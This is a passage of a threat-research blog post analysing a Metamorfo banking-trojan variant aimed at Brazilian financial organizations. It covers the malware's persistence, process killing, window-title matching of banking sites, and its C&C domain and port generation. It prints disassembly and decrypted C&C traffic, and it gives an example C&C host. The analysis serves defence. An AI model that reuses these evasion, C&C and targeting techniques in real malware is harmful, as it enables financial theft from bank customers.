performed by \u201cMSIA1F6.tmp\u201d and the following analysis is based on that.<\/p>\n<p>I will now show you how it functions inside a victim\u2019s machine in the remaining sections:<b><\/b><\/p>\n<h3>Timer3 Timer Function<\/h3>\n<p>\u201cMSIA1F6.tmp\u201d uses several Timers to finish its work. It first starts a Timer named Timer3, which is triggered once each 500 MS.<\/p>\n<p>In its timer function, it collects the victim\u2019s system information, such as the Windows version, Login user name, and so on. It then adds an auto-run program inside victim\u2019s system registry, so that it runs when the system starts. The top of Figure 6 shows that it has been added into the auto-run group in the system registry of my test machine, and below that is where the \u201cKJFLDKRE.msi\u201d file is located.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_101953514.img.png\/1578614769163\/metamorfo-six.png\" alt=\"Figure 6. Auto-run group and \u201cKJFLDKRE.msi\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6. Auto-run group and \u201cKJFLDKRE.msi\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To prevent the victim from noticing any exception on the process list, it terminates the MsiExec.exe process. It looks for the MsiExec.exe process in the running process list by its name and then it calls TerminateProcess() to kill the process. It needs at least four MsiExec.exe processes to finally execute \u201cMSIA1F6.tmp\u201d.<\/p>\n<p>Figure 7 is a code snippet used to kill four \u201cmsiexec.exe\u201d processes.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1830306363.img.png\/1578614818869\/metamorfo-seven.png\" alt=\"Figure 7. Code snippet terminating four \u201cmsiexec.exe\u201d processes\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7. Code snippet terminating four \u201cmsiexec.exe\u201d processes<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you may have noticed, the process name \u201cmsiexec.exe\u201d is decrypted. Besides this, it contains another nearly 2,000 encrypted strings in the process, which creates a serious challenge for an analyst trying to understand its code.<\/p>\n<p>It then kills Timer3 and starts Timer1.<\/p>\n<h3><b>Timer1 Timer Function<\/b><\/h3>\n<p>Timer1\u2019s interval is set the same as Timer3\u2019s, which is 500 MS.<\/p>\n<p>The major task of this timer function is to find the most interesting Apps or web pages based on the victim\u2019s behaviors.<\/p>\n<p>It obtains the window title of the topmost program the victim is using at each 500 MS interval, calls the APIs GetForegroundWindow() and GetWindowTextA(), and then performs a string match to determine if that program is the one that it wants to collect information from.<\/p>\n<p>During my analysis, I was able to determine that the targets are all Brazilian financial organizations. Next, I will elaborate all of the ways that Metamorfo determines if those programs are running.<\/p>\n<h3><b>APPs (installed clients):<\/b><\/h3>\n<p>It detects three installed finance applications by calling the API FindWindowA(), with the Windows class for each one.<\/p>\n<p>Here is an example code showing how it finds one application by calling FindWindowA(&quot;SunAwtFrame&quot;, 0).<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A1D&nbsp; push 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; lpWindowName<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A1F&nbsp; lea &nbsp;edx, [ebp+var_124]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A25&nbsp; mov &nbsp;eax, offset _str_C0589A51A329AEA.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [SunAwtFrame]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A2A&nbsp; call decrypt_string <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A2F&nbsp; mov &nbsp;eax, [ebp+var_124] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&#8221;SunAwtFrame&#8221;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A35&nbsp; call @System@@LStrToPChar$qqrx17System@AnsiString <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A3A&nbsp; push eax&nbsp;&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; <\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #37bf64; background: #D9D9D9;\">lpClassName<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\"> &#8220;SunAwtFrame&#8221;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A3B&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">call FindWindowA<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; &nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A40&nbsp; cmp &nbsp;eax, [edi]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525A42&nbsp; jnz &nbsp;short loc_525AA1<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3><b>Web Pages<\/b>:<\/h3>\n<p>When the victim opens the web page of an online bank, the web page title will include the bank name information. Metamorfo uses string matching to determine if the victim is working on a financial web page using a variety of institution names and acronyms.<\/p>\n<p>Below is a code snippet of how Metamorfo performs a string match:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&#8230;]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E93 lea &nbsp;edx, [ebp+var_1B4]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E99 mov &nbsp;eax, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; System::AnsiString<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525E9C call @Sysutils@UpperCase$qqrx17System@AnsiString <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; Sysutils::UpperCase(System::AnsiString)<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EA1 mov &nbsp;eax, [ebp+var_1B4]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EA7 push eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EA8 lea &nbsp;edx, [ebp+var_1B8]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EAE mov &nbsp;eax, offset _str_0A1336275B9FD74.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Name of the bank]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EB3 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EB8 mov &nbsp;eax, [ebp+var_1B8] <strong>;&rdquo;<\/strong><\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Name of the bank<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EBE pop &nbsp;edx <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; upper case of topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EBF <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC4 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC6 jg&nbsp; short <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Name of the bank<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">_found<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EC8 lea &nbsp;edx, [ebp+var_1BC]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525ECE mov &nbsp;eax, offset _str_29DB1CCA0BB2122.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Alternate name of the bank<\/span><\/em><\/strong><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050;\">]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525ED3 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525ED8 mov &nbsp;eax, [ebp+var_1BC] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&rdquo;Alternate name of the bank&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EDE mov &nbsp;edx, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE1 <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE6 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EE8 jg&nbsp; short <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">Alternate name of the bank<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">_found<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EEA lea &nbsp;edx, [ebp+var_1C0]<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EF0 mov &nbsp;eax, offset _str_0435F40658F86D8.Text <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; ;;; de=&gt; [Bank URL]<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EF5 <strong>call decrypt_string<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525EFA mov &nbsp;eax, [ebp+var_1C0] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">;&rdquo;Bank URL&rdquo;<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F00 mov &nbsp;edx, [ebp+var_4] <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00b050; background: #D9D9D9;\">; topmost window title<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F03 <strong>call string_match<\/strong> <\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F08 test eax, eax<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">00525F0A jle &nbsp;short loc_525F69<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">[&#8230;]<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As mentioned before, those matching strings are encrypted, but they are decrypted before being used in string_match(). Once any of the strings is matched, Metamorfo records the financial organization\u2019s name in a global variable and it then connects to its C&amp;C server to tell what was triggered and to receive command and control commands. If none of string matches is triggered, Metamorfo does nothing, but keeps checking with Timer1 every 500 MS.<\/p>\n<h2>Host and Port of C&amp;C Server<\/h2>\n<p>To increase the difficulty of being blocked, the host of C&amp;C server is generated dynamically in a special way, which keeps the host string mutative each time. There is a function which is in charge of this task.<\/p>\n<p>Here is an example of a host string: \u201cssqld12g1744gu.dynu.com\u201d. The last part, \u201c.dynu.com\u201d, is fixed. The first part is a combination that consists of three parts, which are \u201cssq1d\u201d, \u201c12\u201d and \u201cg17744gu\u201d. \u201c12\u201d is the number of the current month, for instance: \u201c12\u201d for Dec, \u201c01\u201d for Jan, \u201c02\u201d for Feb and so on. The other two substrings are constant strings. There are a total of 620 constant strings that can generate 620 host strings, which are split into 31 groups, one for every day of the month. Each group then has 20 strings for each day, and the function randomly picks one of these.<\/p>\n<p>All of these constant strings are encrypted, and are only decrypted just before using.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1777650826.img.png\/1578615680077\/metamorfo-eight.png\" alt=\"Figure 8. Partial set of decrypted host strings for December\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8. Partial set of decrypted host strings for December<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>From Figure 8, you can see the decrypted host strings for December. There are 31 lines, one for each day, and 20 on each line, each separated by a comma. For other months it changes the \u201c12\u201d in the middle to the corresponding month number.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_520795363.img.png\/1578615717979\/metamorfo-nine.png\" alt=\"Figure 9. All decrypted ports of C&amp;C server\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9. All decrypted ports of C&amp;C server<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Using the same model, it has 310 ports, or 10 ports for each day. There is a separate function for randomly picking up a port from the 10 ports assigned to the day number (1-31). Figure 9 shows the detail for those decrypted ports.<\/p>\n<h2>Command and Control with C&amp;C Server<\/h2>\n<p>On my test machine, I opened the web page of a listed Brazilian financial organization to trigger a string match in Timer1. It then connected to the C&amp;C server and relayed the information that a financial organization connection had been detected. I captured that encrypted communication traffic and decrypted it. The results are listed below:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[&lt;&lt;MANDASOCKET&gt;&gt;]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">&lt;|OK|&gt;<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">&lt;|Socket-Principal|&gt;6294954&lt;&lt;|<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">&lt;|Info|&gt;8974&lt;|&gt; <em>Bank Name<\/em> &lt;|&gt;****-PC V.8 &lt;|&gt;Windows 7 Ultimate&lt;|&gt;&lt;&lt;|<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-VIDEO-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-PING-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #00007f; background: #EDEDFB;\">[-REINICIAR-OS-]<\/span><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: #7f0000; background: #FBEDED;\">[-PONG-]<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When the connection is established, it sends \u201c[&lt;&lt;MANDASOCKET&gt;&gt;]\u201d first, and the server replies \u201c&lt;|OK|&gt;\u201d, which asks for the information about what happened on the victim\u2019s device. An \u201c&lt;|Info|&gt;\u201d packet is then sent out containing the port number (8974), &quot;Bank Name&quot; is the name of the financial organization, the victim\u2019s computer name (****-PC), client version (V.8), as well as victim\u2019s OS name (Windows 7 Ultimate). NOTE: \u201c&lt;|&gt;\u201d is kind of a delimiter, while \u201c&lt;&lt;|\u201d is an end symbol.<\/p>\n<p>In the Metamorfo client there is a function called Conn1Read(), a function of the Conn1 socket which processes the control commands from the C&amp;C server for this main socket. Figure 10 is a screenshot of when Metamorfo is about to encrypt the &lt;|Info|&gt; packet in a debugger.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_170589532.img.png\/1578615994901\/metamorfo-ten.png\" alt=\"Figure 10. In &lt;|OK|> command branch, it is about to encrypt &lt;|Info|> packet&#8221;\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10. In &lt;|OK|&gt; command branch, it is about to encrypt &lt;|Info|&gt; packet<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you can see from the traffic above, there are many other commands, like &quot;[-PING-]&quot;, &quot;[-PONG-]&quot;, &quot;[-VIDEO-]&quot; and so on. Going through the function Conn1Read(), I obtained all of the control commands and the purpose of each command.<\/p>\n<p>The following table lists most of the control commands for the main socket and their descriptions.\u00a0 \u00a0\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image.img.png\/1578616527727\/metamorfo-table-one.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none 